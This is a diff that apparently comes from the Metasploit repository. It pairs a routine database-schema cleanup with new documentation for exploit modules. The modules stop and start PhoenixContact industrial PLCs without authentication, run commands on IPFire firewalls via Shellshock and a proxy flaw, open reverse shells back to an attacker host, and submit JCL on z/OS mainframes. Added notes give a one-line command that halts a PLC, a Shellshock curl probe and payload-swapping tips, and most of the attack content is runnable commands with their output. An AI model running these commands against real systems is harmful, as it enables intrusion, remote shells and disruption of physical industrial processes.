create_table "hosts", force: :cascade do |t|
|
||||
t.datetime "created_at"
|
||||
t.inet "address", null: false
|
||||
t.string "mac"
|
||||
|
@ -186,12 +186,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "hosts", ["state"], name: "index_hosts_on_state", using: :btree
|
||||
add_index "hosts", ["workspace_id", "address"], name: "index_hosts_on_workspace_id_and_address", unique: true, using: :btree
|
||||
|
||||
create_table "hosts_tags", force: true do |t|
|
||||
create_table "hosts_tags", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "tag_id"
|
||||
end
|
||||
|
||||
create_table "listeners", force: true do |t|
|
||||
create_table "listeners", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
|
@ -205,7 +205,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "macro"
|
||||
end
|
||||
|
||||
create_table "loots", force: true do |t|
|
||||
create_table "loots", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
|
@ -222,7 +222,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "loots", ["module_run_id"], name: "index_loots_on_module_run_id", using: :btree
|
||||
|
||||
create_table "macros", force: true do |t|
|
||||
create_table "macros", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.text "owner"
|
||||
|
@ -232,7 +232,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "prefs"
|
||||
end
|
||||
|
||||
create_table "metasploit_credential_cores", force: true do |t|
|
||||
create_table "metasploit_credential_cores", force: :cascade do |t|
|
||||
t.integer "origin_id", null: false
|
||||
t.string "origin_type", null: false
|
||||
t.integer "private_id"
|
||||
|
@ -256,7 +256,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
|
||||
add_index "metasploit_credential_cores", ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_logins", force: true do |t|
|
||||
create_table "metasploit_credential_logins", force: :cascade do |t|
|
||||
t.integer "core_id", null: false
|
||||
t.integer "service_id", null: false
|
||||
t.string "access_level"
|
||||
|
@ -269,7 +269,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "metasploit_credential_logins", ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true, using: :btree
|
||||
add_index "metasploit_credential_logins", ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_cracked_passwords", force: true do |t|
|
||||
create_table "metasploit_credential_origin_cracked_passwords", force: :cascade do |t|
|
||||
t.integer "metasploit_credential_core_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -277,7 +277,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_cracked_passwords", ["metasploit_credential_core_id"], name: "originating_credential_cores", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_imports", force: true do |t|
|
||||
create_table "metasploit_credential_origin_imports", force: :cascade do |t|
|
||||
t.text "filename", null: false
|
||||
t.integer "task_id"
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -286,7 +286,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_imports", ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_manuals", force: true do |t|
|
||||
create_table "metasploit_credential_origin_manuals", force: :cascade do |t|
|
||||
t.integer "user_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -294,7 +294,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_manuals", ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_services", force: true do |t|
|
||||
create_table "metasploit_credential_origin_services", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.text "module_full_name", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -303,7 +303,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_services", ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_sessions", force: true do |t|
|
||||
create_table "metasploit_credential_origin_sessions", force: :cascade do |t|
|
||||
t.text "post_reference_name", null: false
|
||||
t.integer "session_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -312,7 +312,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_sessions", ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_privates", force: true do |t|
|
||||
create_table "metasploit_credential_privates", force: :cascade do |t|
|
||||
t.string "type", null: false
|
||||
t.text "data", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -322,7 +322,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_publics", force: true do |t|
|
||||
create_table "metasploit_credential_publics", force: :cascade do |t|
|
||||
t.string "username", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -331,7 +331,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_publics", ["username"], name: "index_metasploit_credential_publics_on_username", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_realms", force: true do |t|
|
||||
create_table "metasploit_credential_realms", force: :cascade do |t|
|
||||
t.string "key", null: false
|
||||
t.string "value", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -340,27 +340,27 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_realms", ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true, using: :btree
|
||||
|
||||
create_table "mod_refs", force: true do |t|
|
||||
create_table "mod_refs", force: :cascade do |t|
|
||||
t.string "module", limit: 1024
|
||||
t.string "mtype", limit: 128
|
||||
t.text "ref"
|
||||
end
|
||||
|
||||
create_table "module_actions", force: true do |t|
|
||||
create_table "module_actions", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_actions", ["detail_id"], name: "index_module_actions_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_archs", force: true do |t|
|
||||
create_table "module_archs", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_archs", ["detail_id"], name: "index_module_archs_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_authors", force: true do |t|
|
||||
create_table "module_authors", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
t.text "email"
|
||||
|
@ -368,7 +368,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "module_authors", ["detail_id"], name: "index_module_authors_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_details", force: true do |t|
|
||||
create_table "module_details", force: :cascade do |t|
|
||||
t.datetime "mtime"
|
||||
t.text "file"
|
||||
t.string "mtype"
|
||||
|
@ -391,21 +391,21 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_details", ["name"], name: "index_module_details_on_name", using: :btree
|
||||
add_index "module_details", ["refname"], name: "index_module_details_on_refname", using: :btree
|
||||
|
||||
create_table "module_mixins", force: true do |t|
|
||||
create_table "module_mixins", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_mixins", ["detail_id"], name: "index_module_mixins_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_platforms", force: true do |t|
|
||||
create_table "module_platforms", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_platforms", ["detail_id"], name: "index_module_platforms_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_refs", force: true do |t|
|
||||
create_table "module_refs", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
@ -413,7 +413,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_refs", ["detail_id"], name: "index_module_refs_on_detail_id", using: :btree
|
||||
add_index "module_refs", ["name"], name: "index_module_refs_on_name", using: :btree
|
||||
|
||||
create_table "module_runs", force: true do |t|
|
||||
create_table "module_runs", force: :cascade do |t|
|
||||
t.datetime "attempted_at"
|
||||
t.text "fail_detail"
|
||||
t.string "fail_reason"
|
||||
|
@ -433,7 +433,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_runs", ["session_id"], name: "index_module_runs_on_session_id", using: :btree
|
||||
add_index "module_runs", ["user_id"], name: "index_module_runs_on_user_id", using: :btree
|
||||
|
||||
create_table "module_targets", force: true do |t|
|
||||
create_table "module_targets", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.integer "index"
|
||||
t.text "name"
|
||||
|
@ -441,7 +441,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "module_targets", ["detail_id"], name: "index_module_targets_on_detail_id", using: :btree
|
||||
|
||||
create_table "nexpose_consoles", force: true do |t|
|
||||
create_table "nexpose_consoles", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.boolean "enabled", default: true
|
||||
|
@ -457,7 +457,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "name"
|
||||
end
|
||||
|
||||
create_table "notes", force: true do |t|
|
||||
create_table "notes", force: :cascade do |t|
|
||||
t.datetime "created_at"
|
||||
t.string "ntype", limit: 512
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
|
@ -473,7 +473,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
|
||||
add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree
|
||||
|
||||
create_table "profiles", force: true do |t|
|
||||
create_table "profiles", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.boolean "active", default: true
|
||||
|
@ -482,7 +482,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "settings"
|
||||
end
|
||||
|
||||
create_table "refs", force: true do |t|
|
||||
create_table "refs", force: :cascade do |t|
|
||||
t.integer "ref_id"
|
||||
t.datetime "created_at"
|
||||
t.string "name", limit: 512
|
||||
|
@ -491,7 +491,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "refs", ["name"], name: "index_refs_on_name", using: :btree
|
||||
|
||||
create_table "report_templates", force: true do |t|
|
||||
create_table "report_templates", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "path", limit: 1024
|
||||
|
@ -500,7 +500,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "reports", force: true do |t|
|
||||
create_table "reports", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "rtype"
|
||||
|
@ -513,13 +513,13 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "name", limit: 63
|
||||
end
|
||||
|
||||
create_table "routes", force: true do |t|
|
||||
create_table "routes", force: :cascade do |t|
|
||||
t.integer "session_id"
|
||||
t.string "subnet"
|
||||
t.string "netmask"
|
||||
end
|
||||
|
||||
create_table "services", force: true do |t|
|
||||
create_table "services", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
t.integer "port", null: false
|
||||
|
@ -536,7 +536,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "services", ["proto"], name: "index_services_on_proto", using: :btree
|
||||
add_index "services", ["state"], name: "index_services_on_state", using: :btree
|
||||
|
||||
create_table "session_events", force: true do |t|
|
||||
create_table "session_events", force: :cascade do |t|
|
||||
t.integer "session_id"
|
||||
t.string "etype"
|
||||
t.binary "command"
|
||||
|
@ -546,7 +546,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "created_at"
|
||||
end
|
||||
|
||||
create_table "sessions", force: true do |t|
|
||||
create_table "sessions", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.string "stype"
|
||||
t.string "via_exploit"
|
||||
|
@ -565,7 +565,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "sessions", ["module_run_id"], name: "index_sessions_on_module_run_id", using: :btree
|
||||
|
||||
create_table "tags", force: true do |t|
|
||||
create_table "tags", force: :cascade do |t|
|
||||
t.integer "user_id"
|
||||
t.string "name", limit: 1024
|
||||
t.text "desc"
|
||||
|
@ -576,35 +576,35 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_creds", force: true do |t|
|
||||
create_table "task_creds", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "cred_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_hosts", force: true do |t|
|
||||
create_table "task_hosts", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "host_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_services", force: true do |t|
|
||||
create_table "task_services", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_sessions", force: true do |t|
|
||||
create_table "task_sessions", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "session_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "tasks", force: true do |t|
|
||||
create_table "tasks", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "module"
|
||||
|
@ -622,7 +622,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "settings"
|
||||
end
|
||||
|
||||
create_table "users", force: true do |t|
|
||||
create_table "users", force: :cascade do |t|
|
||||
t.string "username"
|
||||
t.string "crypted_password"
|
||||
t.string "password_salt"
|
||||
|
@ -637,7 +637,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.boolean "admin", default: true, null: false
|
||||
end
|
||||
|
||||
create_table "vuln_attempts", force: true do |t|
|
||||
create_table "vuln_attempts", force: :cascade do |t|
|
||||
t.integer "vuln_id"
|
||||
t.datetime "attempted_at"
|
||||
t.boolean "exploited"
|
||||
|
@ -649,7 +649,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "fail_detail"
|
||||
end
|
||||
|
||||
create_table "vuln_details", force: true do |t|
|
||||
create_table "vuln_details", force: :cascade do |t|
|
||||
t.integer "vuln_id"
|
||||
t.float "cvss_score"
|
||||
t.string "cvss_vector"
|
||||
|
@ -674,7 +674,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "nx_pci_compliance_status"
|
||||
end
|
||||
|
||||
create_table "vulns", force: true do |t|
|
||||
create_table "vulns", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
t.datetime "created_at"
|
||||
|
@ -691,12 +691,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "vulns", ["name"], name: "index_vulns_on_name", using: :btree
|
||||
add_index "vulns", ["origin_id"], name: "index_vulns_on_origin_id", using: :btree
|
||||
|
||||
create_table "vulns_refs", force: true do |t|
|
||||
create_table "vulns_refs", force: :cascade do |t|
|
||||
t.integer "ref_id"
|
||||
t.integer "vuln_id"
|
||||
end
|
||||
|
||||
create_table "web_forms", force: true do |t|
|
||||
create_table "web_forms", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -708,7 +708,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "web_forms", ["path"], name: "index_web_forms_on_path", using: :btree
|
||||
|
||||
create_table "web_pages", force: true do |t|
|
||||
create_table "web_pages", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -728,7 +728,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_pages", ["path"], name: "index_web_pages_on_path", using: :btree
|
||||
add_index "web_pages", ["query"], name: "index_web_pages_on_query", using: :btree
|
||||
|
||||
create_table "web_sites", force: true do |t|
|
||||
create_table "web_sites", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -741,13 +741,13 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_sites", ["options"], name: "index_web_sites_on_options", using: :btree
|
||||
add_index "web_sites", ["vhost"], name: "index_web_sites_on_vhost", using: :btree
|
||||
|
||||
create_table "web_vulns", force: true do |t|
|
||||
create_table "web_vulns", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.text "path", null: false
|
||||
t.string "method", limit: 1024, null: false
|
||||
t.text "params", null: false
|
||||
t.text "params"
|
||||
t.text "pname"
|
||||
t.integer "risk", null: false
|
||||
t.string "name", limit: 1024, null: false
|
||||
|
@ -766,7 +766,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_vulns", ["name"], name: "index_web_vulns_on_name", using: :btree
|
||||
add_index "web_vulns", ["path"], name: "index_web_vulns_on_path", using: :btree
|
||||
|
||||
create_table "wmap_requests", force: true do |t|
|
||||
create_table "wmap_requests", force: :cascade do |t|
|
||||
t.string "host"
|
||||
t.inet "address"
|
||||
t.integer "port"
|
||||
|
@ -783,7 +783,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "wmap_targets", force: true do |t|
|
||||
create_table "wmap_targets", force: :cascade do |t|
|
||||
t.string "host"
|
||||
t.inet "address"
|
||||
t.integer "port"
|
||||
|
@ -793,12 +793,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "workspace_members", id: false, force: true do |t|
|
||||
create_table "workspace_members", id: false, force: :cascade do |t|
|
||||
t.integer "workspace_id", null: false
|
||||
t.integer "user_id", null: false
|
||||
end
|
||||
|
||||
create_table "workspaces", force: true do |t|
|
||||
create_table "workspaces", force: :cascade do |t|
|
||||
t.string "name"
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
|
|
@@ -0,0 +1,118 @@
PhoenixContact Programmable Logic Controllers are built using a variant of
ProConOS. They communicate using a proprietary protocol over ports TCP/1962 and
TCP/41100 or TCP/20547. This protocol allows a user to remotely determine the
PLC type, firmware and build number on port TCP/1962. A user can also
determine the CPU state (Running or Stopped) and start or stop the CPU.

This functionality is confirmed for the PLC series ILC 15x and 17x on TCP port
20547, and for the ILC 39x series on TCP port 41100. Other series may or
may not work, but there is a good chance that they will.

## Vulnerable Application

This is a hardware zero-day vulnerability that CANNOT be patched. Possible
mitigations include: pulling the plug (literally), using network isolation
(firewall, router, IDS, IPS, network segmentation, etc.) or not allowing bad
people on your network.

Most, if not all, PLCs (computers that control engines, robots, conveyor
belts, sensors, cameras, door locks, CRACs, ...) have vulnerabilities where,
using their own tools, remote configuration and programming can be done
*WITHOUT* authentication. Investigators and underground hackers are just now
creating simple tools to convert the, often proprietary, protocols into simple
scripts. The operative word here is proprietary: right now, that obscurity is
the only thing stopping very bad stuff from happening. PhoenixContact uses an
(unnamed?) low-level protocol for connection, information exchange and
configuration of its PLC devices. This script utilizes that protocol for
finding information and switching the PLC mode from STOP to RUN and vice versa.

## Verification Steps

The following demonstrates a basic scenario; we "found" two devices with port TCP/1962 open:

```
msf > search phoenix
msf > use auxiliary/admin/scada/phoenix_command
msf auxiliary(phoenix_command) > set RHOST 10.66.56.12
RHOST => 10.66.56.12
msf auxiliary(phoenix_command) > run

[*] 10.66.56.12:0 - PLC Type = ILC 150 GSM/GPRS
[*] 10.66.56.12:0 - Firmware = 3.71
[*] 10.66.56.12:0 - Build = 07/13/11 12:00:00
[*] 10.66.56.12:0 - ------------------------------------
[*] 10.66.56.12:0 - --> Detected 15x/17x series, getting current CPU state:
[*] 10.66.56.12:0 - CPU Mode = RUN
[*] 10.66.56.12:0 - ------------------------------------
[*] 10.66.56.12:0 - --> No action specified (NOOP), stopping here
[*] Auxiliary module execution completed

msf auxiliary(phoenix_command) > set RHOST 10.66.56.72
RHOST => 10.66.56.72
msf auxiliary(phoenix_command) > set ACTION REV
ACTION => REV
msf auxiliary(phoenix_command) > run
[*] 10.66.56.72:0 - PLC Type = ILC 390 PN 2TX-IB
[*] 10.66.56.72:0 - Firmware = 3.95
[*] 10.66.56.72:0 - Build = 02/14/11 14:04:47
[*] 10.66.56.72:0 - ------------------------------------
[*] 10.66.56.72:0 - --> Detected 39x series, getting current CPU state:
[*] 10.66.56.72:0 - CPU Mode = RUN
[*] 10.66.56.72:0 - ------------------------------------
[*] 10.66.56.72:0 - --> Sending STOP now
[*] 10.66.56.72:0 - CPU Mode = STOP
[*] Auxiliary module execution completed
```

## Module Options
```
msf auxiliary(phoenix_command) > show options

Module options (auxiliary/admin/scada/phoenix_command):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ACTION     NOOP             yes       PLC CPU action, REV means reverse state (Accepted: STOP, START, REV, NOOP)
   RHOST                       yes       The target address
   RINFOPORT  1962             yes       Set info port
   RPORT                       no        Set action port, will try autodetect when not set
```

By default, the module only reads out the PLC type, firmware version, build
date and current CPU mode (RUN or STOP).

The first three pieces of data (Type, Firmware & Build) are always found on
port TCP/1962 (there is no way of changing that port on the PLC, so there is also no
reason to change the 'RINFOPORT' option).

The CPU mode uses a TCP port that depends on the PLC type; the module will
automatically detect the type and port to use. This can be overridden with the
'RPORT' option, although there is rarely a reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.

**The ACTION option**

ACTION has four possible values:

By default, the module will do nothing to the PLC, hence No Operation or 'NOOP':

```
msf auxiliary(phoenix_command) > set ACTION NOOP
```

The PLC can be forced to go into STOP mode, meaning it stops all execution and all outputs are set to low:

```
msf auxiliary(phoenix_command) > set ACTION STOP
```

The PLC can be forced to go into RUN mode, where it keeps running as it was or it starts executing its current boot programming:

```
msf auxiliary(phoenix_command) > set ACTION START
```

The module can also just read out the CPU mode and then reverse whatever it finds: RUN becomes STOP, STOP becomes RUN:

```
msf auxiliary(phoenix_command) > set ACTION REV
```
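Not part of the write-up above, but a convenient way to script the same STOP action non-interactively is msfconsole's `-q -x` options (the target address is illustrative):

```
msfconsole -q -x "use auxiliary/admin/scada/phoenix_command; set RHOST 10.66.56.72; set ACTION STOP; run; exit"
```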
@@ -0,0 +1,42 @@
## Vulnerable Application

Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
4. Do: ```set rhost 10.10.10.10```
5. Do: ```set PASSWORD admin```
6. Do: ```set CMD ls```
7. Do: ```run```
8. You should see the output of the command that was run.

## Options

**PASSWORD**

The password is set at install time. It may be blank, 'admin', or 'ipfire'.

**CMD**

This is the command to run on the system.

## Scenarios

Example of running the `id` command:
```
msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
rhost => 192.168.2.202
msf exploit(ipfire_bashbug_exec) > set CMD id
CMD => id
msf exploit(ipfire_bashbug_exec) > exploit

[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
[*] Exploit completed, but no session was created.
```
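For background (an illustration, not the module's exact request): "bashbug" is Shellshock (CVE-2014-6271), which triggers when a crafted value such as `() { :;};` reaches a vulnerable bash through the environment of a CGI script. A classic manual probe against a CGI endpoint looks like the sketch below; the URL, port and path are assumptions:

```
curl -k -H 'User-Agent: () { :;}; echo; echo SHELLSHOCK-TEST' 'https://192.168.2.202:444/cgi-bin/index.cgi'
```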
@@ -0,0 +1,47 @@
## Vulnerable Application

Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
4. Do: ```set password admin``` (or whatever it was set to at install)
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.

## Options

**PASSWORD**

The password is set at install time. It may be blank, 'admin', or 'ipfire'.

## Scenarios

```
msf > use exploit/linux/http/ipfire_proxy_exec
msf exploit(ipfire_proxy_rce) > set password admin
password => admin
msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_proxy_rce) > set verbose true
verbose => true
msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(ipfire_proxy_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400

id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```
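If `cmd/unix/reverse_perl` is unsuitable in a given environment, any compatible cmd/unix payload can be swapped in; a short sketch (prompt and addresses are illustrative):

```
msf exploit(ipfire_proxy_exec) > show payloads
msf exploit(ipfire_proxy_exec) > set payload cmd/unix/reverse_bash
msf exploit(ipfire_proxy_exec) > set lhost 192.168.2.229
```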
|
@ -0,0 +1,108 @@
|
|||
z/OS JCL authorized FTP-base command execution - hints & tips
|
||||
|
||||
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit was tested against the FTP daemons of z/OS versions 1.13 and 2.1.
|
||||
|
||||
## Payloads
|
||||
|
||||
If the exploit works, any JCL the user has rights to submit can be submitted.
|
||||
|
||||
See the cmd-type payloads under mainframe that have "jcl" in the payload name, e.g.:
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > show payloads
|
||||
|
||||
Compatible Payloads
|
||||
===================
|
||||
|
||||
Name Disclosure Date Rank Description
|
||||
---- --------------- ---- -----------
|
||||
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
|
||||
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
|
||||
```
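For example, to use the reverse shell payload listed above (the LHOST value here is a placeholder):

```
msf exploit(ftp_jcl_creds) > set PAYLOAD cmd/mainframe/reverse_shell_jcl
PAYLOAD => cmd/mainframe/reverse_shell_jcl
msf exploit(ftp_jcl_creds) > set LHOST 10.10.10.5
LHOST => 10.10.10.5
msf exploit(ftp_jcl_creds) > exploit
```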
|
||||
|
||||
## Verification Steps
|
||||
|
||||
A successful check of the exploit will look like this:
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
|
||||
FTPUSER => ftptest
|
||||
msf exploit(ftp_jcl_creds) > set FTPPASS password
|
||||
FTPPASS => password
|
||||
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
|
||||
RHOST => 10.10.10.1
|
||||
msf exploit(ftp_jcl_creds) > info
|
||||
|
||||
Name: FTP JCL Execution
|
||||
Module: exploit/mainframe/ftp/ftp_jcl_creds
|
||||
Platform: Mainframe
|
||||
Privileged: No
|
||||
